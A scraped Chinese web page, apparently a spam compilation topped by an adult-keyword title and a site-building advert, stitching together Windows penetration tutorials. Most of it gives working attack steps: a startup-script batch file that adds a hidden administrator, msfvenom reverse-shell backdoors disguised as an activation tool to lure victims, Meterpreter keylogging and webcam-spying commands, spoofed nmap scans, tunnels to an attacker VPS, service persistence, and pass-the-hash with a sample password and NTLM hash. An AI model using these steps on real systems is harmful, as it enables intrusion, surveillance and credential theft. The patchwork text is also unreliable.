欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

包含Windows系統(tǒng)滲透原理的詞條

如何越過網段進行內網滲透?

首先你要知道跟你同一個局域網的用戶是否開啟了防火墻或者禁止了同一局域網的共享和安全!如果對方禁用了共享,那你是進不去的,只有用歪門邪道進去了方法如下

創(chuàng)新互聯專業(yè)為企業(yè)提供銅梁網站建設、銅梁做網站、銅梁網站設計、銅梁網站制作等企業(yè)網站建設、網頁設計與制作、銅梁企業(yè)網站模板建站服務,10年銅梁做網站經驗,不只是建網站,更提供有價值的思路和整體網絡服務。

一、 在該機創(chuàng)建一個批處理文件,內容如下:

net user admin /add

net localgroup administrators admin /add

將上述的批處理文件保存為 admin.bat.

注:上述批處理文件作用是創(chuàng)建一個名為 admin 的管理員帳戶(密碼為空)。

二、將此批處理文件作為Windows 的開機啟動腳本。

1、在 運行 對話框中輸入 gpedit.msc

2、定位到 計算機配置一Windows設置一腳本 (啟動/關機), 雙擊右邊窗口的 啟動,在其中添加先前創(chuàng)建的 admin.bat。

3、重新啟動計算機(兩次),系統(tǒng)便有了一個名為admin 的管理員

上述操作在Windows 2000/XP中可行,但要保證帳戶可以訪問注冊表,組策略(創(chuàng)建帳戶的操作實際上也就是在注冊表中添加相應的項和值),而Windows中的缺省的Guest/受限帳戶并無此限制。

或許,我們并不需要用Guest帳戶去創(chuàng)建一個管理員,但設想如果某個程序只有管理員可執(zhí)行,是否也就可用上述的方法來實現呢?

小結:Windows系統(tǒng)默認對Guest/受限帳戶的限制只是表面上的,作為一個有經驗的系統(tǒng)管理員,要做的事情還很多,起碼應該禁止受限用戶訪問/修改注冊表,組策略等。

Kali利用msf滲透Windows電腦(超詳細)

前言

最近整理了一些 奇安信華為深信服大佬 的課件資料+大廠面試課題,想要的可以私信自取, 無償贈送 給粉絲朋友~

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。

MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework實例中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。

演示環(huán)境

使用Kali 2021.3進行演示操作

目標靶機: Win10專業(yè)版

軟件:msfvenom、msfconsole(Kali系統(tǒng)內置)

1.進入管理員模式

命令: sudo su

解釋: 不在管理員模式下運行可能會有權限不夠的提示,為了避免命令執(zhí)行失敗,在管理員下運行以下命令

命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口號 –f exe –o 文件名.exe

解釋: 本地ip寫自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

本地端口自己隨便設置一個沒有被占用的端口號,如果端口號被占用那么文件會生成失敗,換一個端口號就性

文件名可以隨便寫自己喜歡的名字,比如寫Win10激活工具,可能更容易讓目標主機上鉤

當然MSF也可以用來滲透手機、mac、Linux等

接下來運行命令生成文件

默認生成的文件在根目錄下

把剛才生成的文件放到目標靶機Win10系統(tǒng)中

命令: msfconsole

(1)命令: use exploit/multi/handler(選擇模塊)

(2)命令: set payload windows/meterpreter/reverse_tcp(選擇攻擊模塊)

(3)命令: set LhOST 192.168.32.1(填寫自己主機的IP地址)

(4)命令: set lport 1111(填寫剛才生成文件時的端口號)

(5)命令: show options(查看設置參數)

(6)命令: exploit -z -j(后臺執(zhí)行)

我們這里也可以把這個程序偽裝一下,把他的圖標改一下,或者把它捆綁在某些軟件上面,當用戶打開就自動安裝到對方電腦上面

(1)命令: sessions (查看上鉤的用戶)

(2)命令: sessions -i 1 (選擇需要攻擊的用戶,這里選擇第 1 個

命令: run vnc -i

cmd指令:

cat 讀取文件內容到屏幕

cd 更改目錄

checksum 檢索文件的校驗和

cp 將源復制到目標

del 刪除指定文件

dir 列出文件(ls 的別名)

下載 下載文件或目錄

編輯 編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創(chuàng)建目錄

mv 將源移動到目標

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點/邏輯驅動器

upload 上傳文件或目錄

pkill 按名稱終止進程

keyscan_start 開始捕獲擊鍵(開始鍵盤記錄)

keyscan_dump 轉儲按鍵緩沖(下載鍵盤記錄)

keyscan_stop 停止捕獲擊鍵(停止鍵盤記錄)

record_mic X秒從默認的麥克風record_mic音頻記錄(音頻錄制)

webcam_chat 開始視頻聊天(視頻,對方會有彈窗)

webcam_list 單攝像頭(查看攝像頭列表)

webcam_snap 采取快照從指定的攝像頭(攝像頭拍攝一張照片)

webcam_stream 播放視頻流從指定的攝像頭(開啟攝像頭監(jiān)控)

enumdesktops 列出所有可訪問的桌面和窗口站(窗體列表)

getdesktop 得到當前的Meterpreter桌面

reboot 重新啟動遠程計算機

shutdown 關閉遠程計算機

shell 放入系統(tǒng)命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當前的meterpreter桌面

idletime 返回遠程用戶空閑的秒數

keyboard_send 發(fā)送擊鍵

keyevent 發(fā)送按鍵事件

keyscan_dump 轉儲擊鍵緩沖區(qū)

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發(fā)送鼠標事件

screenshare 實時觀看遠程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當前桌面

uictl 控制一些用戶界面組件

record_mic 從默認麥克風錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網絡攝像頭

webcam_snap 從指定的網絡攝像頭拍攝快照

webcam_stream 播放來自指定網絡攝像頭的視頻流

play 在目標系統(tǒng)上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權限提升到本地系統(tǒng)的權限

execute -f notepad 打開記事本

————————————————

原文鏈接:

滲透測試之操作系統(tǒng)識別

利用TTL起始值判斷操作系統(tǒng),不同類型的操作系統(tǒng)都有默認的TTL值(簡陋掃描,僅作參考)

TTL起始值:Windows xp(及在此版本之前的windows)? 128 (廣域網中TTL為65-128)

Linux/Unix64(廣域網中TTL為1-64)

某些Unix:255

網關:255

使用python腳本進行TTL其實質判斷

使用nmap識別操作系統(tǒng):nmap -O 192.168.45.129 #參數-O表示掃描操作系統(tǒng)信息,nmap基于簽名,指紋,特征,CPE編號等方法去判斷目標系統(tǒng)的信息

CPE:國際標準化組織,制定了一套標準,將各種設備,操作系統(tǒng)等進行CPE編號,通過編號可以查詢到目標系統(tǒng)

使用xprobe2進行操作系統(tǒng)識別,專門用來識別目標操作系統(tǒng):xprobe2 192.168.45.129,但結果并不是很精確

被動操作系統(tǒng)識別:不主動向目標主機發(fā)數據包,基于網絡監(jiān)聽原理

通過抓包分析,被動掃描,使用kali中的p0f工具進行網絡監(jiān)聽

p0f:p0f是一種被動指紋識別工具,可以識別您連接的機器,連接到您的盒子的機器,甚至連接在盒子附近的機器,即使該設備位于數據包防火墻后面。

p0f的使用:只要接收到數據包就可以根據數據包判斷其信息,首先輸入p0f,然后在瀏覽器里面輸入目標系統(tǒng)的網址,便會獲得目標系統(tǒng)的信息

或者使用p0f結合ARP地址欺騙識別全網OS

snmp掃描:簡單網絡管理協議,明文傳輸,使用網絡嗅探也可獲取到信息

SNMP是英文"Simple Network Management Protocol"的縮寫,中文意思是"簡單網絡管理協議"。SNMP是一種簡單網絡管理協議,它屬于TCP/IP五層協議中的應用層協議,用于網絡管理的協議。SNMP主要用于網絡設備的管理。由于SNMP協議簡單可靠 ,受到了眾多廠商的歡迎,成為了目前最為廣泛的網管協議。

snmp的基本思想是為不同種類、不同廠家、不同型號的設備定義一個統(tǒng)一的接口和協議,使管理員可以通過統(tǒng)一的外觀面對這些需要管理的網管設備進行管理,提高網管管理的效率,簡化網絡管理員的工作。snmp設計在TCP/IP協議族上,基于TCP/IP協議工作,對網絡中支持snmp協議的設備進行管理。

在具體實現上,SNMP為管理員提供了一個網管平臺(NMS),又稱為管理站,負責網管命令的發(fā)出、數據存儲、及數據分析。被監(jiān)管的設備上運行一個SNMP代理(Agent)),代理實現設備與管理站的SNMP通信。如下圖

管理站與代理端通過MIB進行接口統(tǒng)一,MIB定義了設備中的被管理對象。管理站和代理都實現了相應的MIB對象,使得雙方可以識別對方的數據,實現通信。管理站向代理申請MIB中定義的數據,代理識別后,將管理設備提供的相關狀態(tài)或參數等數據轉換為MIB定義的格式,應答給管理站,完成一次管理操作。

已有的設備,只要新加一個SNMP模塊就可以實現網絡支持。舊的帶擴展槽的設備,只要插入SNMP模塊插卡即可支持網絡管理。網絡上的許多設備,路由器、交換機等,都可以通過添加一個SNMP網管模塊而增加網管功能。服務器可以通過運行一個網管進程實現。其他服務級的產品也可以通過網管模塊實現網絡管理,如Oracle、WebLogic都有SNMP進程,運行后就可以通過管理站對這些系統(tǒng)級服務進行管理。

使用UDP161端口(服務端),162端口(客戶端),可以監(jiān)控網絡交換機,防火墻,服務器等設備

可以查看到很多的信息,但經常會被錯誤配置,snmp里面

有一些默認的Community,分別是Public/private/manager

如果目標的community是public,那么就可以發(fā)送SNMP的查詢指令,對IP地址進行查詢

在kali中存在對snmp掃描的工具,為onesixtyone

在Windows XP系統(tǒng)安裝SNMP協議:

1,在運行框輸入appwiz.cpl

2,找到管理和監(jiān)控工具,雙擊

3,兩個都勾選,然后點OK

使用onesixtyone對目標系統(tǒng)進行查詢:命令為:onesixtyone 192.168.45.132? public

onesixtyone -c? 字典文件? -I? 主機? -o 倒入到的文件 -w 100

onesixtyone默認的字典在:/usr/share/doc/onesixtyone/dict.txt

使用snmpwalk查找目標系統(tǒng)的SNMP信息:snmpwalk 192.168.45.129 -c public -b 2c

snmpcheck -t? 192.168.45.129

snmpcheck -t? 192.168.45.129 -w? 參數-w檢測是不是有可寫權限

SMB協議掃描:server message block,微軟歷史上出現安全問題最多的協議,在Windows系統(tǒng)上默認開發(fā),實現文件共享

在Windows系統(tǒng)下管理員的Sid=500,

SMB掃描:nmap -v -p 139,445 192.168.45.132 --open 參數-v表示顯示詳細信息,參數--open表示顯示打開的端口

nmap 192.168.45.132 -p 139,445 --script=smb-os-discovery.nse

smb-os-discovery.nse:這個腳本會基于SMB協議去判別操作系統(tǒng),主機名,域名,工作組和當前的時間

nmap -v -P 139,445 --script=smb-check-vulns? --script-args=unsafe=1 192.168.45.132

腳本smb-check-vulns:檢查已知的SMB重大的漏洞

后面給腳本定義參數 --script-args=unsafe=1,unsafe可能會對系統(tǒng)有傷害,導致宕機,但要比safe準確

nbtscan -r 192.168.45.0/24參數-r使用本地137端口進行掃描,兼容性較好,可以掃描一些老版本的Windows

nbtscan可以掃描同一局域網不同的網段,對于局域網掃描大有裨益

enum4linux -a 192.168.45.132 :

SMTP掃描:目的在于發(fā)現目標系統(tǒng)的郵件賬號

使用nc -nv 192.168.45.132 25

VRFY root :確定是不是有root用戶

nmap掃描SMTP服務:

nmap smtp.163.com -p25 --script=smtp-enum-users.nse --script-args=smtp-enum-

users.methods={VRFY}

腳本smtp-enum-users.nse用于發(fā)現遠程系統(tǒng)上所有user的賬戶

nmap smtp.163.com -p25 --script=smtp-open-relay.nse,如果郵件服務器打開了open-relay功能,那么黑客可以拿管理員的郵箱去發(fā)送釣魚郵件

防火墻識別:通過檢查回包,可能識別端口是否經過防火墻過濾

設備多種多樣,結果存在一定的誤差

第一種情況:攻擊機向防火墻發(fā)送SYN數據包,防火墻沒有給攻擊機回復,攻擊機再發(fā)送ACK數據包,若防火墻返回RST數據包,那么證明該端口被防火墻過濾

第二種類似

第三種:攻擊機向防火墻發(fā)送SYN數據包,防火墻返回SYN+ACK或者SYN+RST數據包,攻擊者再發(fā)送ACK數據包,若防火墻返回RST數據包,那么就可以證明防火墻對于該端口沒被過濾.unfiltered=open

第四種情況類似,證明該端口是關閉的,或者防火墻不允許其他用戶訪問該端口

使用python腳本去判定:

使用nmap去進行防火墻識別:nmap有系列防火墻過濾檢測功能

nmap -sA 192.168.45.129 -p 22 參數-sA表示向目標主機發(fā)送ACK數據包,參數-sS表示向目標發(fā)送SYN數據包,通過抓包分析收到的數據包判斷是否有防火墻檢測功能

負載均衡識別:負載均衡可以跟為廣域網負載均衡和服務器負載均衡

在kali中使用lbd命令用于識別負載均衡機制

格式:lbd +域名/IP地址,如lbd

WAF識別:WEB應用防火墻,在kali中最常用的waf檢測掃描器

輸入:wafw00f -l:可以檢測出這個工具可以檢測到的waf類別

探測微軟公司的WAF:wafw00f?

使用nmap中的腳本去掃描目標網站使用的waf信息:nmap? ? --script=http-waf-detect.nse

腳本詳情:

nmap補充:

參數:-iL:把IP地址做成文件,使用該參數掃描這個文件里面的IP! nmap -iL ip.txt

-iR:隨機選取目標進行掃描,后面跟需要掃描的主機個數,例:nmap -iR? 20? -p 22:隨機掃描20個主機的22號端口,默認發(fā)送SYN數據包

參數-sn表示不做端口掃描

參數-Pn表示跳過主機發(fā)現,掃描所有在線的主機,掃防火墻幫助很大

參數p0表示進行IP協議ping

參數-n/-R表示不進行DNS解析

參數--dns-servers表示指定一個DNS服務器去解析

參數--traceroute表示進行路由追蹤

參數-sM表示發(fā)送ACK+FIN

參數-sF發(fā)送FIN數據包

參數-sV根據特征庫匹配開放的服務,加上參數--version-intensity 后面加等級,0最小,9最完善

參數--script=腳本名

參數--script=arge.腳本.腳本名

參數--script-updatedb更新腳本

參數--script-help=腳本名? 查看腳本的信息

參數-O檢測操作系統(tǒng)類型

參數--scan-delay 表示每次探測間隔多長時間,后面?zhèn)€時間,如nmap 192.168.45.132 --scan-delay 10s :間隔十秒

參數-f表示設置MTU最大傳輸單元

參數-D表示偽造源地址,增加一些虛假的掃描IP,例:nmap? -D 192.138.1.1,192.151.141.4? 172.16.45.1? :掃描172.16.45.1主機,用這兩個地址做干擾,防止被發(fā)現

參數-S表示偽造源地址,但要獲取得到的IP地址,那么就得登陸到偽造的IP上

參數--proxies指定代理服務器

參數--spoof-mac欺騙mac地址 nmap 10.1.1.1? --spoof-mac=00:11:22:33:44:55

參數-6表示掃描IPv6

內網滲透-代理篇

最近參與內網滲透比較多,認知到自己在會話維持上過于依賴web服務,web服務一旦關閉,便失去了唯一的入口點。

本次以遠程桌面連接來進行說明,介紹幾種常用的連接方式。

本次目標主機ip為:172.16.86.153

使用條件:服務器通外網,擁有自己的公網ip

msf是我進行內網滲透中用的最多的工具,它內置了很多強大的功能,用起來相當方便。

msf的meterpreter內置了端口轉發(fā)功能,可以把內網的端口轉發(fā)到本地。

轉發(fā)目標主機的3389遠程桌面服務端口到本地的8888,使用linux中的rdesktop連接本地的8888端口。

msf內置了socks模塊,在session但基礎上配置路由,調用即可使用,但是速度和穩(wěn)定性都很差,不做詳細介紹。

使用條件:服務器通外網,擁有自己的公網ip

lcx是一個經典的端口轉發(fā)工具,直接把3389轉發(fā)到公網的vps上。

通過大馬上傳lcx.exe,執(zhí)行系統(tǒng)命令,其中1.1.1.1是vps的公網ip。

因為我公網vps使用的是linux的系統(tǒng),lcx對應linux的工具為portmap 。

p1為監(jiān)聽的端口,p2為轉發(fā)到的端口。

成功監(jiān)聽到轉發(fā)出的3389端口。

直接使用遠程桌面服務連接1.1.1.1:33889

基于web服務的socks5隧道的優(yōu)點是,在內網服務器不通外網的情況下也能正常使用。

常用的工具有:reGeorg,reDuh,Tunna和Proxifier。

本次只介紹reGeorg的具體用法。

選擇對應腳本的tunnel上傳到服務器。

訪問上傳文件,顯示如下表示成功。

打開Proxifier,更改為腳本指定的端口。

本地電腦成功通過socks5帶進了目標主機的內網。(若失敗,可能是某些防護檢測到了異常流量,可采用reDuh)

本地電腦直接遠程連接目標主機的內網ip。

使用條件:目標主機通外網,擁有自己的公網ip

選擇對應主機操作系統(tǒng)的執(zhí)行文件。

目標主機為windows系統(tǒng),選擇上傳ew_for_Win.exe文件。

公網vps使用ew_for_linux64文件。

首先在公網vps上執(zhí)行:

-l為Proxifier連接的端口,-e為目標主機和vps的通信端口。

然后在目標主機中執(zhí)行:

socks5隧道建立成功,成功把自己的主機帶進目標內網。

使用Proxifier,配置ip和連接端口。

連接遠程桌面成功。

傳送門

使用條件:目標主機通外網,擁有自己的公網ip

首先需要在公網服務器搭建服務端,搭建方法參考: 傳送門

要注意的是,客戶端和服務端的版本號要一致,否則無法正常使用。

對frpc.ini進行配置,為了保證搭建的隧道不對他人惡意利用,加入賬戶密碼進行驗證。

上傳frpc.exe和frpc.ini到目標服務器上,直接運行frpc.exe(在實戰(zhàn)中可能會提示找不到配置文件,需要使用-c參數指定配置文件的路徑frpc.exe -c 文件路徑)

公網vps主機上運行frps。

隧道建立成功,連接遠程桌面。

類似的工具還有:sSocks,Termite等,不需要每種都掌握,有自己用的順手的就行。

一般在網站服務的web服務關閉后,服務器重啟后,大部門后門都會失效,這時需要用到系統(tǒng)服務封裝工具。

以NSSM來進行示例,封裝frpc為系統(tǒng)服務,建立持久的socks5隧道。

啟動nssm圖形化界面。

選擇想要組冊服務的exe應用。

設置服務的名字。直接點擊install service,如下表示注冊服務成功。

狀態(tài)設置為啟動,重啟電腦進行測試,重啟后frpc.exe自動運行,成功和frps連接。

本次列舉了一些常用的工具,還有很多工具沒有列舉到,

功能原理都是大同小異,有那么幾個用的順手就好。

橫向滲透之Pass The Hash

在上一章總結了windows抓取hash的一些方式。在實際場景中,我們需要更快的擴大戰(zhàn)果,獲取更多控制權限,以及定位域環(huán)境。

橫向滲透:就是在得到一臺主機的控制權限后,將該主機作為突破口、跳板,利用既有的資源嘗試獲取更多的憑據、更高的權限,進而達到控制整個內網、擁有最高權限。

Pass The Hash 哈希傳遞簡稱PTH,可以在不需要明文密碼的情況下,利用LM HASH和NTLM HASH直接遠程登錄。攻擊者不需要花費時間來對hash進行爆破,在內網滲透里非常經典。

常常適用于域/工作組環(huán)境。

靶機:windows server 2008

IP:10.211.55.19

domain:workgroup

user:administrator

pass:cseroad@2008

NTLM-Hash:82c58d8cec50de01fd109613369c158e

psexec類工具大同小異,大部分工具都是通過psexec來執(zhí)行的。原理是: 通過ipc$連接,將psexesvc.exe釋放到目標機器,再通過服務管理SCManager遠程創(chuàng)建psexecsvc服務,并啟動服務。然后通過psexec服務運行命令,運行結束后刪除該服務。

如:Metasploit psexec,Impacket psexec,pth-winexe,Empire Invoke-Psexec

缺點:容易被殺軟檢測到

優(yōu)點:可以直接獲取system權限

因為市面工具比較多,只kali就自帶有很多。所以這里以好用、批量為準則選擇了幾款工具。

mimikatz中pth功能的原理:

windows會在lsass中緩存hash值,并使用它們來ntlm認證,我們在lsass中添加包含目標賬號hash的合法數據結構,就可以使用類似dir這些命令進行認證。

正常訪問server 2008 的盤符是需要用戶名密碼的。

在windows7上經過pth之后就不需要密碼就可以遠程連接。

將獲取的hash添加進lsass中。

在windows 7 上執(zhí)行以下命令:

執(zhí)行后會彈出cmd。在cmd下執(zhí)行 net use \\10.211.55.19\c$ 命令就可以遠程連接。

擴展:

假如我們繼續(xù)探測到10.211.55.8使用的是同一個hash值。我們嘗試使用遠程共享c盤和schtasks 定時計劃任務執(zhí)行獲取一個session。

powershell.bat為

當重啟10.211.55.8機器后,metasploit可得到session

筆者經常使用時的是這三個模塊

以exploit/windows/smb/psexec模塊為例

值得一說的是smbpass配置項支持明文密碼也支持hash(LM-Hash:NTLM-Hash)

成功返回system權限。

CobalStrike 同樣有psexec選項。

在得到一個beacon的基礎上,先在該網段portscan,探測存活主機后。

選擇View--Target--Login--psexec,可批量選擇主機pth。

選擇pth的用戶名和hash值。

從執(zhí)行的命令看得出依然利用的mimikatz。執(zhí)行成功后返回system權限。

該工具可以對C段主機批量pth。

項目在 github

在kali上直接apt就可以安裝

對工作組批量pth命令如下

測試的時候發(fā)現某些命令執(zhí)行后沒有回顯。

更多資料參考:

CrackMapExec:域環(huán)境滲透中的瑞士軍刀

紅隊測試工具-CrackMapExec-遠程執(zhí)行Windows命令

wmi內置在windows操作系統(tǒng),用于管理本地或遠程的 Windows 系統(tǒng)。wmiexec是對windows自帶的wmic做了一些強化。攻擊者使用wmiexec來進行攻擊時,不會記錄日志,不會寫入到磁盤,具有極高的隱蔽性。

安裝成功后,切換到examples目錄下

運行命令為

先加載Invoke-WMIExec.ps1腳本,再加載Invoke-TheHash.ps1腳本,因為Invoke-TheHash 里要用到 Invoke-WMIExec方法

如果要執(zhí)行系統(tǒng)命令。可以加-Command 參數

執(zhí)行后該進程會在后臺運行,可以結合定時任務執(zhí)行嘗試反彈shell。

在測試中發(fā)現,在打了kb2871997 這個補丁后,常規(guī)的Pass The Hash已經無法成功,但默認的Administrator(SID 500)賬號例外,利用這個賬號仍可以進行Pass The Hash遠程ipc連接。

以上所有操作均針對的SID 500。

內網滲透之PTHPTTPTK

橫向移動

丟掉PSEXEC來橫向滲透

看黑客怎么使用Metasploit進行滲透windows7的

很多朋友對使用Metasploit利用后門程序進行滲透windows7都比較感興趣,針對這些以下業(yè)內相關專家就給大家介紹下,當下黑客怎么利用Metasploit進行滲透windows7的。設定目標主機為:cn_win7_x86_7601虛擬機,地址為:192.168.0.116;而本地主機就為:192.168.0.149。方法步驟一:黑客用Msfpayload直接生成相關的后門程序,如下圖。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe方法步驟二:黑客直接就能進入所在的目錄并將屬性進行修改,換為允許以程序執(zhí)行文件,詳細如下圖。進入所在目錄,修改屬性:選擇“允許以程序執(zhí)行文件”,這時候也可以做一些免殺方法步驟三:接著黑客就打開msfconsole并加載exploit/multi/handler模塊并進行設置本地主機,最后就能開始進行監(jiān)聽了,詳細情況如下圖。打開msfconsole,加載exploit/multi/handler模塊,設置本地主機;然后開始監(jiān)聽:exploit-z-j:方法步驟四:黑客需要能將程序直接拷貝都目標主機中并進行執(zhí)行。方法步驟五:以上步驟全部完成后黑客就能通過后門程序反向連接到msf,用msf就能發(fā)起第2次的攻擊然后使用客戶端也就是后門程序就能連接都服務端msf,詳細的如下圖。Meterpreter就是metasploit框架中的一個擴展模塊,因此的話溢出成功后黑客就能攻擊載荷進行使用,一旦攻擊載荷在溢出攻擊成功后就能再返回一個控制通道,這樣就能將它作為攻擊載荷成功獲得目標系統(tǒng)的一個meterpretershell的鏈接。另外,附meterpreter常用命令:getsystem#會自動利用各種各樣的系統(tǒng)漏洞來進行權限提升migrate#進程id進程遷移background#把當前的會話設置為背景,需要的時候在啟用getuid#查看對方正在運行的用戶ps#列出所有的進程getpid#返回運行meterpreter的id號sysinfo#產看系統(tǒng)信息和體系結構shell#切換到cmd的系統(tǒng)權限方式exit#退出shell會話返回meterpreter或終止meterpretergetdesktop截取目標主機當前桌面會話窗口runwebcam-p/var/www#在/var/www目錄監(jiān)控目標主機的攝像頭keylog_recorder#使用migrate將會話遷移至explorer.exe的進程空間后記錄鍵盤

網站名稱:包含Windows系統(tǒng)滲透原理的詞條
網站URL:http://chinadenli.net/article15/dsgcddi.html

成都網站建設公司_創(chuàng)新互聯,為您提供外貿建站動態(tài)網站網站策劃定制網站Google網站維護

廣告

聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯

成都定制網站建設